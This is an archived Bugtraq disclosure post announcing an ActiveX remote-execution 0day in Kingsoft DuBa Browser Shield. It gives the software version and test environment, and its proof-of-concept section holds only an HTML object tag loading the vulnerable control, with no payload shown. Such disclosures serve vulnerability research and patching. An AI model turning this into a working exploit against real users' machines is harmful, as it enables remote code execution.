lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Mon, 18 Jan 2010 20:05:56 -0700 From: superli@...e-mail.net To: bugtraq@...urityfocus.com Subject: Kingsoft DuBa Browser Shield ActiveX Remote Exec 0day POC # Date: 2010.01.17 # Author: superli # Software Link: http://i2d.www.duba.net/i2d/kws3/KWSSetup.exe # Version: 3.0 # Tested on: xpsp3 ie6 # greeting to KingSoft,can you really help users avoiding being hacked ? this vuln almost effect in all of the duba security software. # Code : <object id=TestObj classid="CLSID:{D963BE1A-6B35-47DB-B002-49FAE71D85CC}" style="width:100;height:350"></object>